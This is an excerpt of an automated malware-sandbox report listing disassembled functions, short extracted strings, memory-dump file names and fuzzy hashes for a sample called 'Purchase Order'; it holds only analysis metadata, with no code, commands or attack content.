PH]q, xrefs: 0152CA18
Lj@p, xrefs: 0152C98F
PH]q, xrefs: 0152CA07
0o@p, xrefs: 0152C822
d, xrefs: 0152C7B9
Lj@p, xrefs: 0152C9A5

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q$d
API String ID: 0-654554748
Opcode ID: 1f044ddde55e96331737764490fe03d360444c82f078cb6e15bad7741e38bd50
Instruction ID: 47ff6d03d326b26c205b69919c35350891186853bd8fed3a88ee3f471afe07d3
Opcode Fuzzy Hash: 1f044ddde55e96331737764490fe03d360444c82f078cb6e15bad7741e38bd50
Instruction Fuzzy Hash: C681C775E01218DFDB18DFAAD984A9DBBF2BF89300F14C06AE409AB365DB706941CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01526790 Relevance: 6.7, Strings: 5, Instructions: 438COMMON

Download Yara Rule

Strings

,aq, xrefs: 01526A60
(o]q, xrefs: 015269DA
(o]q, xrefs: 015269E8
(o]q, xrefs: 01526D05
,aq, xrefs: 01526A52

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-615190528
Opcode ID: 46dd17b3d494c3f55dbc964acc5cc214c975b3eb7ab197dd474c73c22da8769d
Instruction ID: 7b1ece14618a6c2bd61ad11818be4707f42522e59d289a930c65e6b89ab092be
Opcode Fuzzy Hash: 46dd17b3d494c3f55dbc964acc5cc214c975b3eb7ab197dd474c73c22da8769d
Instruction Fuzzy Hash: 62026F72A00129DFDB15DF69C984AADBBF6FF8A310F158469E805AB2A1DB70DC41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0152B388 Relevance: 6.6, Strings: 5, Instructions: 346COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0152B7B8
Lj@p, xrefs: 0152B72F
0o@p, xrefs: 0152B5C2
PH]q, xrefs: 0152B7A7
Lj@p, xrefs: 0152B745

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 3c42ab35b0a92af824a02f73c3fda33b7e47b4157d0db94f9f191654ca2e1046
Instruction ID: 392394d09d527d37e016b1565f7d6e3760f9c4027e7d254aae82334ab57c0d52
Opcode Fuzzy Hash: 3c42ab35b0a92af824a02f73c3fda33b7e47b4157d0db94f9f191654ca2e1046
Instruction Fuzzy Hash: D7E1F975E00229DFDB14DFA9C884A9DBBB2FF49310F158469E919AB3A1DB31E841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0152BF10 Relevance: 6.5, Strings: 5, Instructions: 203COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0152C167
Lj@p, xrefs: 0152C105
0o@p, xrefs: 0152BF82
Lj@p, xrefs: 0152C0EF
PH]q, xrefs: 0152C178

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: db6afaf5d16b60f770e93f5ff88e4b2e04df521bb597afbbb670a951653db418
Instruction ID: afc1f5cadf8f9463e1295f36bb91239e4107653588b217af11c1bebb45412954
Opcode Fuzzy Hash: db6afaf5d16b60f770e93f5ff88e4b2e04df521bb597afbbb670a951653db418
Instruction Fuzzy Hash: A5910875E01218DFDB14DFAAC884A9DBBF2BF89300F24C06AE819AB365DB355941CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0152C1F0 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

0o@p, xrefs: 0152C262
Lj@p, xrefs: 0152C3E5
PH]q, xrefs: 0152C458
Lj@p, xrefs: 0152C3CF
PH]q, xrefs: 0152C447

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 1ce023c8d3a7c5dac9e7ef4b91c8c65730c981585bf8c86073a1a6ef75428da5
Instruction ID: 192aa783e87f7f4fd20d1b85ba1b80925b935a20c9ae3e0a399747064b3f74f4
Opcode Fuzzy Hash: 1ce023c8d3a7c5dac9e7ef4b91c8c65730c981585bf8c86073a1a6ef75428da5
Instruction Fuzzy Hash: 4081E775E00218DFDB14DFAAD894A9DBBF2BF89300F14C46AE819AB365DB309941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0152CA92 Relevance: 6.4, Strings: 5, Instructions: 188COMMON

Download Yara Rule

Strings

Lj@p, xrefs: 0152CC6F
PH]q, xrefs: 0152CCE7
Lj@p, xrefs: 0152CC85
PH]q, xrefs: 0152CCF8
0o@p, xrefs: 0152CB02

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 0a6c2df96cddd69dd2352b92f433662191ecf28b9884bb6153eb164066009e3c
Instruction ID: 7fb39ec8b0ad3fa13ac3e01fd4b2c7a62528fc4153c16514ec2efe4174b33609
Opcode Fuzzy Hash: 0a6c2df96cddd69dd2352b92f433662191ecf28b9884bb6153eb164066009e3c
Instruction Fuzzy Hash: FA81E775E01218DFDB18DFAAD884A9DBBF2BF89300F14C06AE819AB365DB345941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01524B31 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

PH]q, xrefs: 01524D99
Lj@p, xrefs: 01524D26
PH]q, xrefs: 01524D88
Lj@p, xrefs: 01524D10
0o@p, xrefs: 01524BA2

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 69b1578a352a50ad30fd0ac6924bf069ba939a6f84be467b0b2819139170960c
Instruction ID: de0072bed63504aefedbe1d6f5d36b4c4ca11ab97a93d3549304421d84b1d672
Opcode Fuzzy Hash: 69b1578a352a50ad30fd0ac6924bf069ba939a6f84be467b0b2819139170960c
Instruction Fuzzy Hash: E881C874E00218DFDB18DFAAD984A9DBBF2BF89300F14C069E419AB365DB345981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0152C4D0 Relevance: 6.4, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

0o@p, xrefs: 0152C542
PH]q, xrefs: 0152C738
Lj@p, xrefs: 0152C6AF
Lj@p, xrefs: 0152C6C5
PH]q, xrefs: 0152C727

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 6f44cfe246c6885374b17dbfb99d7fc41fcda90be653a03ab7db80c3becdc520
Instruction ID: de693185035f9af664be6b5ef6c520eece7765e2b219743df0ad194f44cfa7a3
Opcode Fuzzy Hash: 6f44cfe246c6885374b17dbfb99d7fc41fcda90be653a03ab7db80c3becdc520
Instruction Fuzzy Hash: 7281D775E00218DFDB18DFAAD984A9DBBF2BF89300F14D069E419AB365DB30A941CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0152B552 Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0152B7B8
0o@p, xrefs: 0152B5C2
PH]q, xrefs: 0152B7A7

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID: 0o@p$PH]q$PH]q
API String ID: 0-2023588385
Opcode ID: 85812888bd2bb9954973cca869c3242e1140cb2acad883f90662f31d88bf5608
Instruction ID: fccc2a6967bac29863a9643dae562163fcdde0ae600df97b31ac5f8673cb577a
Opcode Fuzzy Hash: 85812888bd2bb9954973cca869c3242e1140cb2acad883f90662f31d88bf5608
Instruction Fuzzy Hash: AF7107B5E002599FDB18DFAAC984A9DBBF2FF89300F14C06AE804AB365DB345941CF51

Uniqueness

Uniqueness Score: -1.00%

Function 015298B8 Relevance: 3.3, Strings: 2, Instructions: 847COMMON

Download Yara Rule

Strings

4']q, xrefs: 0152A2D3
(o]q, xrefs: 01529CD8

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID: (o]q$4']q
API String ID: 0-176817397
Opcode ID: 06822b19e7e22fcddce0a245a99c1ec6c351c0175c79af88df002f4680ba173b
Instruction ID: 2be831619140678eb219ef4434abfa55ee927684897d363f3e24ac474f83758a
Opcode Fuzzy Hash: 06822b19e7e22fcddce0a245a99c1ec6c351c0175c79af88df002f4680ba173b
Instruction Fuzzy Hash: EE729272A0022ADFCB15CF68C584AAEBBF2FF8A314F158559E9059F3A1D731E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01526168 Relevance: 3.0, Strings: 2, Instructions: 511COMMON

Download Yara Rule

Strings

(o]q, xrefs: 015266A2
Haq, xrefs: 0152656E

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID: (o]q$Haq
API String ID: 0-903699183
Opcode ID: 7f9b764bf58ebdcb9e5456e3e80bfb29ae42155893a229081b97f03948df8853
Instruction ID: f15806393dad8f09595632ba830cfc12bad04863673206c4f038ae2bbfa7c9a0
Opcode Fuzzy Hash: 7f9b764bf58ebdcb9e5456e3e80bfb29ae42155893a229081b97f03948df8853
Instruction Fuzzy Hash: 0012AD71B002199FDB18DF69C894AAEBBF6BF89300F148569E905DB395EB30DC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06CC8C5B Relevance: 2.7, Strings: 2, Instructions: 183COMMON

Download Yara Rule

Strings

PH]q, xrefs: 06CC8E9A
PH]q, xrefs: 06CC8EAB

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 5d01dec8c8759d3f1bb8f34013b5658719bd61d8042e7d4b48dd1fc2db58e875
Instruction ID: 4a9614abd91cb4dab881f4d2aff90d6cca1e1afe5b21e2b47d9d1f48495815cb
Opcode Fuzzy Hash: 5d01dec8c8759d3f1bb8f34013b5658719bd61d8042e7d4b48dd1fc2db58e875
Instruction Fuzzy Hash: 5E81DE74E01218CFDB58CFAAD9947AEBBF2BF89310F20816AD419AB354DB345985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CC11A0 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd051d63798cb77370f6990a31a18174fd537d37cad680fc9c8bd437b45bedc8
Instruction ID: e4129f75b82853c0fc63f02d0e2e101eea8e23bac60d84b92b20225a4c40fa3a
Opcode Fuzzy Hash: fd051d63798cb77370f6990a31a18174fd537d37cad680fc9c8bd437b45bedc8
Instruction Fuzzy Hash: 6B828E74E012299FDB64DF69C894BDDBBB2BF89300F1481EAA40DA7264DB315E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0152EDF0 Relevance: .7, Instructions: 713COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e284bd401d05b08b605660e5aa85a3c4d97b60d2120a29a0cae312755aca085
Instruction ID: 104a24f95a6cb37f21b3d83670dc8d79c4f2801bc328e20cd1dfcde52c2b79a8
Opcode Fuzzy Hash: 0e284bd401d05b08b605660e5aa85a3c4d97b60d2120a29a0cae312755aca085
Instruction Fuzzy Hash: FD72D075E012298FDB64DF69D890BDDBBB2BB4A300F1481EAD409AB395D7309E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CC8608 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 183be6909e9fb4650a570e2716849da0cb0ac143560c5b9660cf25915dc6dbc3
Instruction ID: fc87676ae99cd26cecfdf88ca98899969cfe87ce2eba93deca6653061e28f46d
Opcode Fuzzy Hash: 183be6909e9fb4650a570e2716849da0cb0ac143560c5b9660cf25915dc6dbc3
Instruction Fuzzy Hash: 56E1B374E01219CFDB64DFA5C994B9DBBB2BF89304F2081AAD408AB394DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0152FA10 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a500579a8554d59afb506368d2b06ea989286c408a663c4d2003d251b70b3a1
Instruction ID: 17f10fadd6f78edbefbf78e4229010ad0da0f48289f0fb8a10bfd050743a3b30
Opcode Fuzzy Hash: 4a500579a8554d59afb506368d2b06ea989286c408a663c4d2003d251b70b3a1
Instruction Fuzzy Hash: F1D1B074E01219CFDB54DFA5D994B9DBBB2FF89300F2080AAD809AB365DB345A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CC7050 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88db4be9a51b95008341758c65f89699920660d5b50cc043fc4f502c78741440
Instruction ID: 75caf95a11b7440ae9f9b53c676a37a14995286f47921d8237503e1d88cdd677
Opcode Fuzzy Hash: 88db4be9a51b95008341758c65f89699920660d5b50cc043fc4f502c78741440
Instruction Fuzzy Hash: D7C1B074E01219CFDB54DFA5C994B9DBBB2FF89300F2081AAD809AB364DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CCB6E8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9777d9a0a87227d7ee8f90abbccf8627167609e0b657cab7467f389c6caa7af3
Instruction ID: 8dc5655fee62d0bead7cbd657b80e36467a094dfcba4cc5f96347b5b34dd5914
Opcode Fuzzy Hash: 9777d9a0a87227d7ee8f90abbccf8627167609e0b657cab7467f389c6caa7af3
Instruction Fuzzy Hash: 04A19E74E012288FEB68DF6AC945B9DFBF2AF89310F14C0AAD40DA7254DB705A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CCD670 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0bfc619a03de2d62c4629e743821ee97b0a17780755bcade95f01ff5678c27
Instruction ID: 2b8eb1d4cc161a98af676017baac1a93d69eb139049c4637bed47e50e64708ca
Opcode Fuzzy Hash: 8f0bfc619a03de2d62c4629e743821ee97b0a17780755bcade95f01ff5678c27
Instruction Fuzzy Hash: BBA1AF74E012288FEB68DF6AC944B9DBBF2BF89310F14D0AAD40DA7254DB705A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CCC388 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b52ff9b05783d831376dae848ced8c5bf92286a2bebc3f8616cee5deeacab92e
Instruction ID: ed34d15816bf8861dc75d188e679badf7bc25cd861ee9c1a7428e8516b858b82
Opcode Fuzzy Hash: b52ff9b05783d831376dae848ced8c5bf92286a2bebc3f8616cee5deeacab92e
Instruction Fuzzy Hash: 5BA19375E012288FEB64CF6AC944B9DBBF2AF89310F14C0AAD40DA7254DB745A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CCA408 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d91d3d40031608be9e6bff42cbbcfad709a32130dbc0a0f298ee4d54f149b48
Instruction ID: 422d2f4b65ac465af923e99e6476a17024243f862c1f3955ecc1efbd0dce4a0c
Opcode Fuzzy Hash: 3d91d3d40031608be9e6bff42cbbcfad709a32130dbc0a0f298ee4d54f149b48
Instruction Fuzzy Hash: 0EA1A075E016288FEB68CF6AC944B9DBBF2BF89310F14C0AAD40DA7254DB345A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CCC9D8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd7bc663ed3d9a02affe0db56686f041526aa8abbc16a4ce498ec1d3204dcb35
Instruction ID: 12474305874d1dca9691817c11c3ea495261b50026968dacedc48d04850abcef
Opcode Fuzzy Hash: fd7bc663ed3d9a02affe0db56686f041526aa8abbc16a4ce498ec1d3204dcb35
Instruction Fuzzy Hash: 18A19175E012288FEB68DF6AD944B9DBBF2BF89310F14C0AAD40DA7254DB305A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CCBD38 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b61cd0ceb490f0f48abdb73a9fdb55f11bf8e213819c07e264f826d29f33e8
Instruction ID: e53284d6a7969c01a3955edaa7a4f47ebec35716019c71df3ccf7a506ea91e0f
Opcode Fuzzy Hash: 16b61cd0ceb490f0f48abdb73a9fdb55f11bf8e213819c07e264f826d29f33e8
Instruction Fuzzy Hash: DDA1A074E012288FEB68CF6AC945B9DBBF2BF89310F14C0AAD40DA7255DB305A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CCAA58 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b7c6c372efaec466fd6c4f8188f685e2da10caeb9312609252cdc6566be7cd
Instruction ID: 2dab7c6f7f287a48668582c9346aa24d63ff2702d8d98ad0e9ef59b783b4f96d
Opcode Fuzzy Hash: 94b7c6c372efaec466fd6c4f8188f685e2da10caeb9312609252cdc6566be7cd
Instruction Fuzzy Hash: 93A19075E012288FEB68DF6AC944B9DFBF2AF89310F14C0AAD409A7254DB345A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CCB0A0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b69f0085f2253f9aa92ddf07054a137445d87b5f6bbf4169ecc23768195314c8
Instruction ID: 42fcdbced389fa42760df410b705f82d043bf935e6654b821c08e25e2ad16f06
Opcode Fuzzy Hash: b69f0085f2253f9aa92ddf07054a137445d87b5f6bbf4169ecc23768195314c8
Instruction Fuzzy Hash: 0BA19F75E016288FEB68DF6AC945B9DBBF2BF89310F14C0AAD408A7254DB305A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CCD028 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 783c2bd4d7371ed250da81582254157211b673ad0091d4323a5f8ccc7d718353
Instruction ID: 66c2ef1bb644a2809657fec53196a19cfb91b5a5090dd48732764b3450ed34b2
Opcode Fuzzy Hash: 783c2bd4d7371ed250da81582254157211b673ad0091d4323a5f8ccc7d718353
Instruction Fuzzy Hash: 49A18175E012288FEB68DF6AC944B9DFBF2AF89310F14C0AAD40DA7254DB305A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CCAA4B Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b31b57dc229605ee42ad27e1719c7ddc757edccd05139bd85ccd085f6beb866
Instruction ID: 971f15bfa17480d90ef9d7bcad2e36a9763d6ece9706d6285953f17122676e2d
Opcode Fuzzy Hash: 6b31b57dc229605ee42ad27e1719c7ddc757edccd05139bd85ccd085f6beb866
Instruction Fuzzy Hash: E2718771E016288FEB68CF6AC945B9DFAF2AF89300F14C0AAD50DA7254DB345A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CCB09B Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 324678d87acf5259ce1197bf852206b594e981eeae0f0d3d99fca924712f19bb
Instruction ID: fadc14df0b4bbc1a0c0a9d62b3450dda19575fcb6310ac9ee898ba7ea66a7276
Opcode Fuzzy Hash: 324678d87acf5259ce1197bf852206b594e981eeae0f0d3d99fca924712f19bb
Instruction Fuzzy Hash: 04718771E016288FEB68CF6AC94579DFBF2AF89300F14C1AAD40DA7254DB305A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CCD026 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6891c471c230df85eba4e517c242c9ef8bda8b53d9863e76b7367cecb6420a3d
Instruction ID: 29c2cc6e00bdb95a33ee692c1da9070b074f4eaa2a8fe6922dca23604e8a6d8d
Opcode Fuzzy Hash: 6891c471c230df85eba4e517c242c9ef8bda8b53d9863e76b7367cecb6420a3d
Instruction Fuzzy Hash: 01717571E016288FEB68CF6AC944B9DFAF2BF89300F14C1AAD40DA7254DB345A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CC85F8 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ef689efb2889506eb92171b5a1a627feb3504682400c631f5f11d0db575d0a2
Instruction ID: 30474752c347abcb865c9ad91bd5c58c9f4d0e076a5cea544942f760a0345cfb
Opcode Fuzzy Hash: 0ef689efb2889506eb92171b5a1a627feb3504682400c631f5f11d0db575d0a2
Instruction Fuzzy Hash: 6E41D3B1E012088BEB54DFAAC9547DEFBB2BF89300F64C06AC418AB294DB755946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 06CCA3FB Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a10d47a08e79f013d83efa39c33a87c1a12a0690edf03c1c3a9ec45ea5097780
Instruction ID: cdef64fe7bee1e6102516fa5b733e4a311fd2f367e3cc5e45aef1f8e2b375fe0
Opcode Fuzzy Hash: a10d47a08e79f013d83efa39c33a87c1a12a0690edf03c1c3a9ec45ea5097780
Instruction Fuzzy Hash: 66416CB1E016188FEB58CF6BC9457D9FAF3AFC8310F14C1AAC50CA6264DB740A858F51

Uniqueness

Uniqueness Score: -1.00%

Function 06CCB6E3 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf53907cf6203525efb9a817c8e417cd21ff4d71e00328fc429ddb1fd8fc251b
Instruction ID: 4f7bb33a18873236b8546d9fc4086709e7ae7886c29f3e9223205a97694bf97f
Opcode Fuzzy Hash: cf53907cf6203525efb9a817c8e417cd21ff4d71e00328fc429ddb1fd8fc251b
Instruction Fuzzy Hash: B74158B1E016189BEB58CF6BCD457D9FAF3AFC8314F14C1AAC50CA6264DB740A868F51

Uniqueness

Uniqueness Score: -1.00%

Function 06CCD66B Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

